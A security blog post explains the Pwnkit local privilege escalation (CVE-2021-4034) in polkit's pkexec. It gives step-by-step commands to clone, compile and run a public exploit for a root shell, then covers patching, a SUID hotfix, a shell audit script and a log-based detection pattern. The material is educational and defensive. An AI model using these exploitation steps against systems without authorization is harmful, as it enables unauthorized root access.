Pwnkit Exploit: Local Privilege Escalation in Polkit Package (CVE-2021-4034)

CVE-2021-4034, colloquially known as Pwnkit, is a petrifying Local Privilege Escalation (LPE) vulnerability detected in the “Polkit” package, which is installed by default on almost every major Linux distribution (and many other Unix-like operating systems), such as Ubuntu, Debian, Fedora, CentOS and Arch. In a nutshell, this vulnerability affects virtually every mainstream Linux system on the planet.

This blog presents an overview of this vulnerability along with a Proof of Concept (POC), as well as guidance to patch affected systems. So without further ado, let’s dive in!!

“This vulnerability is one of our most beautiful discoveries; to honour its memory, we recommend listening to DJ Pone’s “Falken’s Maze” (double pun intended) while reading this advisory. Thank you very much!”

~Qualys

Overview

CVE-2021-4034 is a 12-year-old security vulnerability discovered in the “Polkit” package, a system utility, and it grants attackers root privileges on Linux (or Unix-like) systems. A Proof of Concept exploit emerged in the wild merely hours after the technical advisory of the vulnerability was made public.

Dubbed Pwnkit, this vulnerability was discovered by security researchers at the cybersecurity firm Qualys and was formally announced in January 2022. It has existed in every version of the “Polkit” (formerly PolicyKit) package since it was first released in May 2009, and it allows any unprivileged user to easily gain complete administrative access over almost any Linux machine that has the Polkit package installed. Alas, Polkit is installed by default on almost every major Linux distribution, such as Ubuntu, Debian, Fedora, CentOS and Arch, making this vulnerability extremely widespread.


What is Polkit?

Prior to looking into the vulnerability, it would help you to understand what Polkit really is.

According to Wikipedia, “Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.”

In simpler words, when a user tries to perform an action that requires a higher level of privileges, Polkit can be utilized to determine whether the user has the required permissions. It is integrated with systemd and is much more configurable than a conventional sudo system. Indeed, it is sometimes referred to as the “sudo of systemd”, providing a granular system with which to assign permissions to users.

When interacting with Polkit, we can make use of the pkexec utility – a SUID-root program that is installed by default on every major Linux distribution, which contains the Pwnkit vulnerability. pkexec, analogous to the sudo command, allows an authorized user to execute commands as another user, doubling as a substitute to sudo. If no username is specified, the command would run as the administrative superuser, root.

As an example of using this utility, attempting to run the useradd command through pkexec in a GUI session results in a pop-up asking for credentials:

pkexec useradd test1234

(Screenshots: the credentials pop-up on Ubuntu 21.10 and on Garuda Linux)

In a nutshell, Polkit can be thought of as a fine-grained alternative to the simpler sudo system that one is familiar with.


The Vulnerability

The CVE-2021-4034 vulnerability has been given a CVSS (Common Vulnerability Scoring System) base score of 7.8 by Red Hat and is therefore declared “high severity”, which means “one must take immediate action”. However, NVD analysts have not yet provided a CVSS score for this CVE at this time.

As mentioned earlier, the Pwnkit vulnerability exists in the pkexec utility – the primary front-end to the Polkit system. We will not delve too deep into jargon in the interest of readability; however, if one is interested, we encourage you to read through the Qualys Security Advisory for the complete technical explanation of this vulnerability.

The summary is this: versions of pkexec released prior to the patch do not handle command-line arguments securely, leading to an “out-of-bounds write” vulnerability that allows an attacker to manipulate the environment with which pkexec is run. This is all one really needs to know.

This flaw concerns a case of memory corruption. Despite not being remotely exploitable, an attacker that has already established a foothold on a system via other means can weaponize this vulnerability to their full advantage to gain complete root privileges.

“This vulnerability is an attacker’s dream come true.”

~Qualys

Exploitation

Exploiting Pwnkit is, unfortunately, incredibly easy.

There are many exploits publicly available on the internet, and writing your own version is also not a difficult task. The version that we will use for exploitation is written in C by berdav, and the repository for this code can be found here. This variation uses the dangerous GCONV_PATH variable to include a malicious shared object file that calls the /bin/sh shell with root permissions.

Prerequisites

Before exploitation, some system requirements must be satisfied for the exploit to run. The target system on which the exploit would be run must have the following utilities installed on it:

  • git
  • gcc
  • make

Type the following commands to install these utilities on Debian/Ubuntu distributions:

$ sudo apt install git
$ sudo apt install gcc
$ sudo apt install make

Type the following commands to install these utilities on Arch Linux distributions:

$ sudo pacman -S git
$ sudo pacman -S gcc
$ sudo pacman -S make

The git and gcc utilities are installed by default in almost every Linux distribution, but the make utility has to be installed manually. After these prerequisites have been met, the real exploitation commences.

Exploitation
  • Open the terminal and check the OS version of the target system using the command:
$ lsb_release -a
  • Check the user id.
$ id
  • Clone the exploit code from the GitHub repository.
$ git clone https://github.com/berdav/CVE-2021-4034.git
  • Navigate to the CVE-2021-4034/ directory that contains the exploit.
$ cd CVE-2021-4034/
  • Compile the exploit using the following command:
$ make
  • Run the exploit to gain instant root access over the target!
$ ./cve-2021-4034 
  • Check the user id once again to confirm success.
# id

Proof of Concept

The above exploitation was carried out on Ubuntu 21.10 and Garuda Linux systems, and success was achieved along with a Proof of Concept.

Verified on Ubuntu 21.10
Verified on Garuda Linux

Remediation

The ease of exploitation and its ubiquitous nature make this an absolutely devastating vulnerability. So how do we protect against it?

Fortunately, developers tend to be fairly swift when it comes to developing patches for critical vulnerabilities. As a prime example, at the time of writing, Canonical have already released a patched version of the Polkit package in the APT package manager for all versions of Ubuntu that are not end-of-life. The patched version can easily be installed with a simple upgrade.

sudo apt update && sudo apt upgrade

In distributions that have not yet released a patched version of the package, the immediately recommended hotfix would be to simply remove the SUID bit from the pkexec binary. This can be done with a command such as the following:

sudo chmod 0755 "$(which pkexec)"

Although far from ideal, it works as a temporary solution until more distributions start packaging versions of Polkit that are patched against Pwnkit.
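
A quick way to confirm that the hotfix took effect, as an added example (not part of the original post or of the Polkit project); the function names and the fixed candidate paths are assumptions. A patched pkexec keeps its SUID bit by design, so this checks the temporary hotfix only.

```shell
#!/bin/sh
# Added example: check whether the temporary hotfix (no SUID bit on pkexec)
# is in place. Function names and the fixed paths below are assumptions.

# suid_state FILE: print "missing", "suid" or "no-suid" for one path.
suid_state() {
    if [ ! -e "$1" ]; then
        echo missing
    elif [ -u "$1" ]; then        # -u is true when the set-user-ID bit is set
        echo suid
    else
        echo no-suid
    fi
}

# pkexec_candidates: the pkexec found on PATH plus common install locations.
pkexec_candidates() {
    {
        command -v pkexec 2>/dev/null || true
        printf '%s\n' /usr/bin/pkexec /usr/local/bin/pkexec
    } | sort -u
}

# audit_pkexec [FILE...]: report each existing candidate and return 1 if any
# of them still carries the SUID bit, 0 otherwise.
audit_pkexec() {
    if [ "$#" -eq 0 ]; then
        set -- $(pkexec_candidates)
    fi
    rc=0
    for p in "$@"; do
        state=$(suid_state "$p")
        if [ "$state" = missing ]; then
            continue
        fi
        printf '%-8s %s\n' "$state" "$p"
        if [ "$state" = suid ]; then
            rc=1
        fi
    done
    return "$rc"
}

if audit_pkexec; then
    echo "hotfix in place: no SUID pkexec found"
else
    echo "pkexec is still SUID: hotfix not applied"
fi
```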

It should be noted that there are many variations of the Pwnkit exploit using different environment variables and exploiting the vulnerability in different ways. Some of these leave traces and logs behind, others do not.
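
For the variants that do leave traces, the sketch below (an added example, not from the original post) searches auth logs for the two pkexec messages that the Qualys advisory names as side effects of exploitation. The function names, the log file locations mentioned in the comments and the sample lines are assumptions or constructed for illustration.

```shell
#!/bin/sh
# Added example: flag pkexec log entries that the Qualys advisory associates
# with environment-variable based exploitation of CVE-2021-4034.

# Message fragments from the advisory; the environment-variable message is
# matched loosely so small wording differences between versions still hit.
PWNKIT_PATTERN='pkexec.*(The value for the SHELL variable was not found|The value for environment variable .* contains)'

# pwnkit_log_hits [FILE...]: print matching lines (stdin when no file given).
# Typical inputs (assumption): /var/log/auth.log or /var/log/secure.
pwnkit_log_hits() {
    grep -E -h -- "$PWNKIT_PATTERN" "$@"
}

# pwnkit_users [FILE...]: count hits per invoking user, highest count first.
pwnkit_users() {
    pwnkit_log_hits "$@" | awk '{
        for (i = 1; i < NF; i++)
            if ($i ~ /^pkexec\[[0-9]+\]:$/) {   # next field is "user:"
                sub(/:$/, "", $(i + 1)); n[$(i + 1)]++; break
            }
    } END { for (u in n) print n[u], u }' | sort -rn
}

# Constructed syslog-style sample (host, users, PIDs and paths are made up).
sample_log() {
cat <<'EOF'
Jan 27 10:01:12 web01 sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
Jan 27 10:03:40 web01 pkexec[4312]: bob: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/1] [CWD=/tmp/x] [COMMAND=(constructed)]
Jan 27 10:05:02 web01 pkexec[4377]: bob: The value for environment variable XAUTHORITY contains suspicious content [USER=root] [TTY=/dev/pts/1] [CWD=/tmp/x] [COMMAND=(constructed)]
Jan 27 10:09:55 web01 pkexec[4410]: alice: Executing command [USER=root] [TTY=unknown] [CWD=/home/alice] [COMMAND=/usr/sbin/useradd test1234]
EOF
}

sample_log | pwnkit_users
```

An empty result does not prove a clean system, since some exploit variants leave no log traces at all.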

You can check that a system is patched by attempting to run a copy of the exploit against it; if it returns the pkexec help menu, then the system is patched.

(Screenshot: Ubuntu 21.10)

Conclusion

During the course of this blog, you have been given a high-level insight into CVE-2021-4034, along with a Proof of Concept and some of the available remediations to patch it. You have also seen a demonstration of one of the exploit versions being used to attack and compromise a vulnerable target. You should now have a working knowledge of this devastating vulnerability.

And if you like geeking out more about this security vulnerability, then dive in deep with LogPoint’s Detecting PwnKit local privilege escalation vulnerability on how to detect and mitigate this flaw in a pro’s way.

However, Pwnkit was not the first Polkit vulnerability in this time period. You may also wish to check out Scientyfic World covering CVE-2021-3560: a timing attack that led to another local privilege escalation vulnerability.


Note from the author

This blog is brought to you with the wholehearted intent that it improves your awareness, learning and understanding of this vulnerability to better the security landscape. Test systems you own, apply patches and mitigations where appropriate. This is a recent and real-world threat – whether you are a security professional or a script kiddy – this blog is to help you and the world understand and gain awareness of this widespread vulnerability. It should not be used for exploitative gain or self-serving financial incentives.

Additionally, do bear in mind that the developers of the Polkit package work on open source as a labour of love and passion. They are volunteers who maintain their projects in their spare time. There should not be any bashing, shame or malice towards those individuals.

As with everything else, please further your knowledge so that you can be a pedestal and pillar for the information security community. While “Hollywood Hacking” is cool and flashy, cybersecurity is a team sport. Please review the external resources and make this community a better place.

Educate, share and help!!

Time is what determines security. With enough time nothing is unhackable.


References

While there are numerous other articles, blogs, resources and learning materials regarding CVE-2021-4034, we have provided these links to external resources as they may have information that would be of interest to you.

If you wish to gain hands-on experience on this vulnerability, visit TryHackMe’s room.

Sayak Karar

Ethical Hacker | Coder | Blogger | Audio Editor | Orator | Web Developer
